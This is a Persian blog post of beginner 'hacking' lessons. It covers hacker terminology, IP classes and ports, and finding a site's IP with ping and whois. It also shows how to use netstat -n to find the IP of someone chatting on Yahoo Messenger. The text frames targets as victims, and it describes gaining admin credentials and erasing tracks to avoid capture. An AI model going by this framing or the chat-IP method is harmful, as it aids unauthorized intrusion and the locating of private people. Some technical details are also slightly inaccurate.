تایپ میکنیم ping yahoo.com و اینتر را میزنیم و سپس به ما جواب های زیر را که در شکل زیرمی بینید را میدهد که آی پی سایت یاهو را می توان در سطر اول آن دید، در این عکس من آی پی سایت یاهو را میخواهم پیدا کنم :

اگر بجای ping yahoo.com از ping http://www.yahoo.com/ استفاده کنید به احتمال زیاد آی پی هایی که پیدا کردین با هم فرق میکنند این فقط برای سایت های بزرگ مثل یاهو اتفاق می افته ولی برای سایت های کوچک جواب برای هردو چه ping yahoo.com و چه ping http://www.yahoo.com/ با هم یکسان میباشد.
در کل می توانم بگویم که اگه هدف شما یک سایت کوچک میباشد دستور پینگ برای شما مناسب میباشد.شکل زیر مربوط به ping http://www.yahoo.com/ میباشد برای مقایسه آن با ping yahoo.com گذاشتم که خوب فرقشونو بفهمید.

3-روش بعدی کامل ترین روش برای پیدا کردن IP همه سایت ها از کوچیک تا بزرگه که به نظر من همیشه برای همه سایت ها چه کوچک و چه بزرگ ازاین روش استفاده کنید نام این روش روش whois (هو ایز) است شیوه کار با هو ایز به این صورت میباشد که ما به بعضی از سایت ها که بعدا چند تا از بهترین هاشونو بهتون معرفی میکنم مراجعه میکنیم و از آنها می خواهیم که IPسایتی که میخواهیم رو به ما بدهند این سایت ها سایت هایی هستند که مسئول ثبت domain ها یا همان آدرس های اینترنتی مثل یاهو و .... هستند. درمورد هوایز درپست بعدی کاملا توضیح میدهم که خوب یاد بگیرید هو ایز رو کامل کامل توضیح خواهم داد چون بهترین و مهمترین راه پیدا کردن آی پی سایت ها میباشد.ولی فعلا فقط یه تمرین کوچک با هوایز را میخواهیم تجربه کنیم و فعلا فقط روشش رو میگم . در مرورگر Internet Explorer خود آدرس زیر را با دقت تایپ و اینتر کنید:
http://www.samspade.org/t/ipwhois?a=XXXXXX
که بجای XXXXXX باید آدرس سایت مورد نظر را وارد کنید مثلا برای یاهو میشود:
http://www.samspade.org/t/ipwhois?a=yahoo.com
یا
http://www.samspade.org/t/ipwhois?a=www.yahoo.com
در هو ایز کردن جواب برای هردو چه با wwwچه بدون wwwتقریبا یکی میباشد ولی برای سایت های بزرگ مثل یاهو به ما یه رنج آی پی میدهد با مقایسه دو آی پی بدست آمده منظورم و متوجه میشوید.ولی به نظر من هم در هو ایز و هم در پینگ بدون wwwآدرس ها را تایپ کنید با مقایسه دو شکلی که گذاشتم علت را متوجه میشوید.

این شکل مربوط به http://www.samspade.org/t/ipwhois?a=yahoo.com می باشد:

این شکل مربوط به http://www.samspade.org/t/ipwhois?a=www.yahoo.com می باشد:

تقسیم بندی آدرس های IP :
خوب دوستان این قسمت یکی از بدرد بخور ترین قسمت های آموزش مربوط به آی پی هست که شما با خوندنش میتونید با دیدن یک آی پی تشخیص دهید که یک آی پی از چه کلاسی است (درمورد کلاس آی پی توضیح میدم)و اینکه برای یک Client است یا یک Server .
آدرس های IP را کلا به 5کلاس تقسیم بندی میکنند که از کلاس A تا E نام دارند ولی ازبین این 5 کلاس 3تا کلاس اول یعنی A,B,C کاربرد عملی دارندکه درمورد آنها توضیحاتی را ارائه میدهم :
بررسی IP های کلاس A,B,C :
1- کلاس A : اگرهمانطور که قبلا گفتم آی پی را به صورت XXX.YYY.YYY.YYY درنظر بگیرید،کلاس A تمام آی پی هایی را شامل میشود که XXX در آن بین 1،126 است.این کلاس ویژه Backbone های بزرگ اینترنتی است ودرهنگام ثبت Domain برای گرفتن IP از آنها استفاده میشود.بنابراین اکثر سایت ها چنین آی پی های دارند . این کلاس را کلاس 8/ هم می نامند.
2-کلاس B : این کلاس تمام آی پی هایی را شامل میشود که XXX در آن بین 128 ,191 است.این کلاس هم ازجمله کلاس های پرکاربرد است.این کلاس را 16/هم میگویند.
3- کلاس C : این کلاس تمام آی پی هایی را شامل میشود که XXX در آن بین 192،223 است.این کلاس معمولا به Ispهایی که خدمات Dial Up ارائه می دهند، تعلق می گیرید(البته نه همیشه).بنا براین اگر به صورت Dial Upبه اینترنت متصل شوید،چنین IP می گیرید.این کلاس را 24/هم می گویند.
خوب اگه خیلی باهوش باشید که هستین میپرسید که چرا XXX هیچ وقت نه درکلاس A و نه درکلاس B,عدد 127 را شامل نمی شود؟
جواب : چون این عدد یعنی 127 برای کامپیوتر خودمان رزرو شده است . مثلا 127.0.01 معمولا یعنی Localhostیعنی خدمان.
پیدا کردن IP طرف مقابل در Chat در yahoo messenger :
دوستان این روش الان دیگه معمولا جواب نمیده ولی شاید روی سرویس پک یک عمل کندولی درکل فکر نکنم که زیاد بشه باهاش کار کرد ولی بدانید که یکی از مهمترین دستورات هک میباشد که حتما باید کامل یاد بگیرید.
حالا میخواهیم آی پی یک کلاینت که با Dial UP به اینترنت متصل شده است را پیدا کنیم و فرض می کنیم که با شما در پی ام در حال چت کردن هست . درضمن این روش بیشتر وقتی جواب میدهد که با یک نفر درحال چت کردن باشید و اگر با طرف ویس کنید یا بگویید برایتان یک فایل تو پی ام بفرستد خیلی بهتر کار میکند.
حالا همون طوری که گفتم صفحه سیاه cmd را باز کنید و در آن یکی از دستورات زیر را تایپ و اینترکنید:
netstat -n یا netstat دستور اولی یعنی netstat -n برای پیداکردن IP طرف مقابل است ودستور دوم یعنی netstat گاه می تواند اسم کامپیوتر اورابرای شما نشان دهد.
بعد از تایپ عبارت netstat -n یه سری آی پی به شما میدهد که جلویشان پورت های مربوط به همان آی پی رو نوشته آی پیی که جولوش عدد پورت 5101 داشته باشد آی پیه طرف مقابله اگه این عدد نبود یعنی اینکه هیچ یک از آن آی پی ها برای طرف مقابل نیست.برای بدست آوردن آی پی طرف مقابل بهتر از نرم افزار هایی مثل : X-netstat استفاده کنید.
خوب دوستان جلسه سوم هم نوشتم ولی بازم نظرات کمه خواهش میکنم با نظراتتان به من بگویید که آموزش ها بدرد میخورن یا نه ممنونم راستی مطالب بالا از معلومات اندک خودم بود .

+ نوشته شده در جمعه هشتم دی 1385ساعت 11:7 توسط حمید و مرتضی |

آموزش هک

مقدمات هک

جلسه اول : ترمینولوژی (اصطلاح شناسی)
Hacker کیست ؟ هکربه شخصی میگویندکه باسیستم های رایانه ای آشنایی نسبتا کاملی داردواین توانایی رودارد که باروش هایی خاص،بدون اجازه وارد آن سیستم ها شود وبه عبارتی به آن سیستم ها نفوذ کند.تعریفی از جهت خوب بودن یا بد بودن یک هکرنمی توان ارائه دادیک هکربسته به شخصیتش میتواند یک نفوذگرمخرب باشد یا یک نفوذگرسازنده که هدفش فقط بالابردن سطح ایمنی سرورها و.... میباشد.
برای اینکه بتوانیم یک هکرشویم باید بدانیم که یک هکر ازچه راهی وارد یک سیستم یا رایانه میشود ؟ همانطور که همه میدونین هر سیستم رایانه ای یا به عبارت کامل تر هرسیستم عامل حاصل کارتعدادی انسان است وچون به قول معروف انسان جایزالخطاست حتما این سیستم ها دارای خطاهایی درخود هستند که به آنها دراصطلاح bugمی گویند . (bug:خطاهایی که بعدازارائه محصول که دراینجا سیستم عامل است به بازاربه تدریج کشف میشوند)
بلافاصله بعداز اینکه یک حفره یا همان باگ مشخص وکشف شود شرکت ها نرم افزارهایی را به سرعت درعرض چندساعت ایجاد میکنند تا مشکل را رفع کنند این نرم افزارهای تکمیل کننده رو دراصطلاح patch می گویند.بعداز ساختن این نرم افزار ها مدیران شبکه یا همان webmastersها آنهارا درعرض چندروزدانلود کرده ومشکل باگ خودرابرطرف میکنند.(کارهکرها درهمین وقفه زمانی شروع و تمام میشود یعنی همین چندروز که هنوز webmasterها patchهارو دانلود نکردند.)
تعریف چنداصطلاح یا به عبارتی تعریف انواع هکرها:
Hackerواقعی : به این گونه هکرها هکرهای سامورایی میگویند هکرهای سامورایی کسانی هستندکه هدفشان ازنفوذ به سیستم های کامپیوتری نشان دادن ضعف امنیتی آن سیستم است نه سوء استفاده ...
wacker(واکر): هکری است که هدفش ازنفوذ به یک سیستم استفاده از اطلاعات سیستم قربانی ست.
Cracker(کراکر):هکری است که هدفش ازنفوذ به سیستم های کامپیوتری ،چیزی نیست جز خرابکاری ودردسرو اختلال درآنها.
Preaker:این دسته از هکرها ازقدیمی ترین هکرها هستند که برای انجام کارشان ونفوذ به رایانه نیازنداشتندوکارشان نفوذ به خطوط تلفن برای تماس مجانی یا استراق سمع (چه کاربدی) بوده.
تقسیم بندی انواع انواع کامپیوترهای شبکه :
کامپیوترهای Server : کامپیوترهایی هستند که وظیفه دارند اطلاعات شبکه رو تامین کنند یعنی مثل کامپیوترهایی که سایت هارو نگه میدارند و آنها رو ساپورت میکنند.
کامپیوترهای Client : کامپیوترهایی که فقط وفقط استفاده کننده هستند ازگروه این دسته کامپیوترها میتوان به همین کامپیوترخودتان که دارید ازش استفاده میکنیدرا نام برد.
انواع سیستم عامل هایی که Serverها ازآن ها استفاده میکنند کدامند؟ این سیستم عامل ها را براساس دوره مصرف به دودسته تقسیم میکنیم که به شرح زیر است.
دسته اول: سیستم عامل های فعلی (آنهایی هم اکنون ازآنها استفاده میکنند):
1- سیستم عامل های خانواده Unix=Sun Solaris ، Linux ، FreeBSD
2- سیستم عامل های خانواده Windows=WinNT ، Win2000
3- OsMac
دسته دوم: سیستم عامل های قدیمی(آنهایی که اکنون دیگر مورداستفاده قرارنمی گیرند):
DEC20 ، DEC10 ، IRIS ، AIX و...

سیستم عامل هایی که شما برای هک باید یاد بگیرید:ازخانواده Unix = Linuxوازخانواده Windows=Win2000

چیزهایی که یک هکرباید فرا بگیرد:
1- لینوکس وویندوز2000 را روی سیستم نصب کرده و شروع به یاد گیری کند.
2- شروع به یادگیری زبان Cیا Perl چون بیشتر برنامه های هک یا بهتر بگم همش با همینا نوشته میشه.
3- شروع به یادگیری TCP/IPکنید.
تقسیم بندی انواع حملات:
1- حمله به روش DOS=Denial Of Service Attack
2- حمله به روش Exploit
3- حمله به روش Info Gathering(تلنت کردن یکی از مثال های آن است)
4- حمله به روش Disinformation
هرکدام را سرجایشان توضیح میدم.
یک زبان زیبا و جالب که هکر ها ازآن استفاده میکنند ونام این زبان t speak 133میباشد.گاهی هکرها درهنگام نوشتن به جای تعدادی ازحروف انگلیسی معادل های قراردادی به کارمیبرند درزیر لیستی از این حروف را دراختیار شما قرار میدهم که کامل نیست زیرا این زبان خود به سه دسته مبتدی متوسط و حرفه ای تقسیم بندی میشود البته در زیرمیتوان گفت ترکیبی از کل اینهارو نوشتم ولی اگه خواستین کامل یادتون بدم درنظرات بفرمایید تا براتون لیست کاملشو بزارم.
0 <= O
1 <= L; I
2 <= Z
3 <= E
4 <= A
5 <= S
6 <= G
7 <= T
8 <= B
| <= L; I
@ <= at duh
$ <= S
)( <= H
}{ <= H
/\/ <= N
/\/\ <= W
\/\/<= M
<| <= P; D
>|<= K
ph <= f
z <= s
مثلا اگر بخواهیم با این زبان بنویسیم (he Speaks) میشود :

}{3 $|>34|< z

این معادل هارا تا آن جایی که میتونید استفاده نکنید فقط یاد بگیرید که به قول خودمونی کم نیارین.
مراحلی که یک هکر برای هک کردن باید حتما طی کند:
1- اولین ومهمترین کاری که باید بکند یا به عبارته بهتر اولین تصمیمی که باید بگیرد اینه که نوع کامپیوتری که میخواهد به آن نفوذ کند را (کلاینت یا سرور)مشخص کند چون روش هک کردن این دو بجز مراحل اولیشان با هم کاملا متفاوت است.
2- دومین تصمیم و انتخاب ،انتخاب یک کامپیوتر مشخص (مثلا کامپیوتری که سایت مورد نظرمان را نگه میدارد که این مثالی برای کامپیوترسروراست ویا کامپیوترشخصی که دارید باهاش چت میکنیدکه مثالی برای کامپیوتر کلاینت است.وجمع آوری اطلاعات مفید درمورد آن است.
جمع آوری اطلاعات از قربانی یا Victimرا Footprintingمیگویند که اطلاعاتی مثل کشف IPاوست .یکی دیگر از اطلاعاتی که برای یک هکراهمیت دارد پیداکردن نوع سیستم عامل ونیز برنامه هایی است که کامپیوترهدف ازآنها استفاده میبردویکی از مهمترین وگاهی اوقات خطرناک ترین کارها تست پورت های آن کامپیوتربرای دیدن اینکه کدام پورت ها باز وکدام ها بسته.
3- مرحله بعدی درواقع شروع تلاش برای نفوذ به سیستم است .این نفوذ سطوح مختلف دارد و بالا ترین آن که درکامپیوترهای سرور روی میدهد حالتی است که بتوانusername وpassword مربوط به مدیرکامپیوتر (administrator) یا superuserرا به دست آورده و ازطریق این Shell Account به نهایت نفوذدست یابیم ولی گاه به دلایل مختلف نمیتوان به این سطح دست یافت اما به هرحال برای مرحله بعدی میتواند استفاده شود.این مرحله جایی است که هنرشما به عنوان یک هکر آغاز شده ونیز به پایان میرسد.
4-این مرحله درواقع بعد از نفوذ روی میدهد که در آن به سطحی از کنترل سیستم رسیده اید.رفتار شما دراین مرحله مشخص کننده این است که چه نوع هکری هستید(سامورایی،واکر،کراکر) .درواقع دراین مرحله کارهای مورد نظر خود را باید انجام دهید.
5- مرحله آخر پاک کردن ردپاست تا گیر نیفتیم ،دوستان این را میتوان گفت مهمترین این مراحل نام برد زیرا بعضی از سیستم ها آمارLoginرانگه میدارندکه درمورد آنها این مرحله بسیار مهم است.

اگر بخواهم مراحل بالا را برایتان یه دسته بندیه یک خطی کنم به این صورت میشود:
Selection -> Footprinting -> Penetration -> [Changings] -> Cleaning
خوب دیگه دوستان به پایان درس جلسه اول رسیدیم خسته نباشید مطالبی رو که مطالعه فرمودین را با برداشتی کلی از سخنان پدرهک ایران آرازصمدی درآمیخته با تجربیات خیلی خیلی اندک خودم نوشتم.راستی اگر با مفاهیمی مثل آی پی و پورت و... آشنایی ندارید درنظرات بنویسید تا برایتان در پست بعدی قبل از شروع جلسه دوم توضیح بدم .
جلسه دوم رازمانی مینویسم که با نظراتتان وبلاگ را مزین بفرمایید .
فعلا بای

...............................................................................................................

آشنایی ابتدایی با IP و PORT

جلسه دوم : (آشنایی ابتدایی با IP و PORT )
IP:
آی پی ها به یک سری عدد که درظاهر بدین صورت هستند XXX.XXX.XXX.XXX (به جای Xها عدد میباشد) گفته میشود و عدد آی پی به هر کامپیوتر متصل به اینترنت داده میشود تا به کمک آن شماره به آن کامپیوتر دسترسی داشت . برای درک بهتر آی پی به شما میگویم که عدد آی پی مثل شماره تلفن میباشد وتقریبا نقشش در برقراری ارتباط ما با کامپیوتر مثل همان شماره تلفن است مثلا اگر بخواهیم با دوستمان صحبت کنیم اگر راهمان دورباشد باید با استفاده از یک رابط این کاررا انجام دهیم در هنگام تماس با دوستمان رابط ما تلفن و در هنگام برقراری ارتباط کامپیوتر رابط ما همین عدد آی پی میباشد .
بررسی اعداد آی پی برای Clients و Servers :
عدد IP برای کامپیوترهایی که حالتی مثل سروردارند(مثل سایت ها) و نیز کامپیوتر های کلاینتی که بعضی هاشون از روشی غیراز Dial Up (شماره گیری)استفاده میکنند(یعنی اونایی که از Adsl یا ازاین دست استفاده میکنند)عددی ثابت و برای دیگران عددی متغیراست.
چه طور IP درروش Dial Up تغییرمیکند؟
خیلی سادس یعنی درواقع شما لازم نیست که کاره خاصی انجام دهید هربار که شما به شرکت Ispخودتان با Modem تماس میگیریدیعنی به عبارت ساده تر زمانی که شما میخواهید Connect شویدشرکت به شما عددی جدید نسبت میدهد و همانطور که دربالا اشاره کردم این عدد در هربا تماس و درهر اتصال متغیر میباشد.
بررسی ساده ساختمان IP :
عدد IP یک عدد 32 بیتی (4بایتی) است که برای راحتی به صورت XXX.XXX.XXX.XXX که منظور از XXX عددی بین 0 تا255 است .
مثال ازیک آی پی : برای درک بهتر یک آی پی این آی پی را برای شما مثال میزنم 217.219.176.69 (بین اعداد نقطه می باشد).
حتی اسم هایی مثل www.hamid-hacker.blogfa.com هم که برای اتصال استفاده میکنید،درنهایت باید به یک آی پی تبدیل شود تا شما وارد سایت حمید هکر شوید که این کار توسط DNSانجام میشود درمورد DNSفعلا صحبت نمی کنم فقط همین را بدانید که تبدیل آدرس هایی نظیر www.hamid-hacker.blogfa.com به یک آی پی توسط سرویسی بنام DNS انجام میشود.
تشخیص اینکه یک IP برای یک Client است یا یک Server :
درآی پی ها معمولا XXX اولی یعنی این XXX.XXX.XXX.XXX معنای خاصی دارد که بعدا کاملا توضیح میدم ولی فعلا فقط بدانید که اگر به روش Dial Up به اینترنت وصل شوید،معمولا عددی که به عنوان XXX اول می گیرید،بین 192 تا 223 خواهد بود این مطلب برای تشخیص کامپیوتر های کلاینت از سرور(بیشتر درایران) خیلی میتواند مفید باشد.
بدست آوردن IP خود:
برای این کار راههای متفاوت زیادی وجود دارد که من به ۲تا از بهترین راهها اشاره میکنم
1- در نوار تسک بار خود وارد منوی Start شوید بعد کادر Run را از آنجا انتخاب کنید تا باز شود (از کلید های ویندوز+Rهم میتوانید برای باز کردن کادرRun استفاده کنین) بعد درون کادر تایپ کنید cmd بعد یک اینتر بزنید(یا روی Ok کلیک کنید) بعد از این کار یک صفحه سیاه رنگ باز میشود شما باید درون آن تایپ کنید ipconfig بعد اینتر را فشاردهید لیستی به شما نمایش داده میشود که میتوانید IP خودرادرسطر اول که درجلوی Ip Address می باشد مشاهده کنید این کار را چند بار انجام دهید تا کاملا یاد بگیرید.
2-بعد از اتصال به اینترنت روی دو مانیتورکوچک چشمک زن درکنار ساعت ویندوز خود دابل کلیک کنید،پنجره ای باز میشود که دارای دوتب میباشد شما باید تب Details را انتخاب کنید خوب حالا به پایین ترین سطر این پنجره نگاه کنید دو گزینه وجود دارد که این ها میباشد Server Ip Address و Client Ip address که همانطور که خودتان هم میدانید آن IP که جلوی Client Ip Address نوشته شده است آی پی شما میباشد و به Server Ip Address کاری نداریم.

PORT:
اکثر دوستان پورت را به این صورت تعریف میکنند : محلی است که داده ها وارد یا خارج می شوند .خداییش فهمیدین؟ من که نفهمیدن ولی من با یک مثال به شما یک درک از پورت را میدهم تا وقتی به شما میگویم پورت واقعا منظور را درک کنید . ببینید پورت ها درواقع مثل خیابان های خودمان میباشند یعنی چی؟خوب ببینید خیلی سادس انسانها برای عبور مرور ،حمل و نقل و بردن اجناس خود به نقاط مختلف کشور نیاز به یک مسیر و راه یا به عبارتی نیاز به یک جاده یا خیابان دارند وگرنه نمیتوانند این کارهارو انجام دهند پورت ها هم دقیقا همین کار را باید انجام دهند یعنی پورت مساوی با خیابان همین در مبحث پورت ها اگر شنیدید پورت 25 یعنی خیابان 25 و منظورمان این است که نرم افزاری(ماشین) که از خیابان 25 عبور میکند چه نرم افزاری است .
چند نوع پورت وجود دارد :
دونوع 1- پورت های حقیقی (یعنی پورت هایی که با چشم دیده میشوند مثل پورت موس و از این دست ابزار)
2- پورت های منطقی (یعنی پورت هایی که به صورت مجازی وجود دارند و با چشم دیده نمی شوند که تعدادشان بسیار زیاد است و بیشتر کارهای کامپیوتر را همین پورت ها انجام میدهند.)
در هک معمولا با پورت های نرم افزاری یا همان پورت های منطقی کارداریم که به هر پورت یک عدد نسبت میدهیم مثلا پورت 25 این اعداد بین 1 تا 65535 هستند.
پورت هایی که فعال هستند هرکدام توسط یک نرم افزار خاص مدیریت میشوند مثلا پورت 25 برای ارسال Emailاست بنا براین باید توسط یک نرم افزار این کار انجام شود واین نرم افزار برروی پورت 25 منتظر(فال گوش) می ماند.
اینجا ممکن است هر شخص از یک نرم افزار خاص برای ارسال استفاده کنه مثلا یکی از Outlook و یکی دیگه از یه نرم افزار دیگه استفاده کنه ولی به هرحال پورت 25 همیشه برای ارسال Email است.
این پورت هارا شما انتخاب نمیکنید که مثلا پورت 23 چه کار کند بلکه خودشان بطور پیشفرض وجود دارند.
درپایین لیستی از مهمترین پورت ها و کاربردشان را می بینید:

درپست های بعدی بازم به بررسی کامل این دو مبحث میپردازم ولی این هارو خوب یاد بگیرید چون پایه هستند.خوب دوستان جلسه دوم رو هم با اینکه نظرات کم بود نوشتم خداییش اگه خوشتون اومد حالااز هر جای وب،یک نظر هم بدین راستی تمام مطالب بالا از خودم بود باز نگید کپی زدی فعلا بای تا های .

+ نوشته شده در جمعه یکم دی 1385ساعت 8:43 توسط حمید و مرتضی |

۞۞ …هک … ۞۞

تبليغات رايگان و مجاني

هك سايت توسط حميد هكر

چگونه ويروس Blaster را بسازيم [نت پد]

آموزش هک آی دی یاهو

آموزش کامل NetCat

TCP و UDP

دستور nslookup

تکمیل مبحث Whois

آموزش هک

پیوندهای روزانه

نوشته های پیشین

آرشیو موضوعی

پیوندها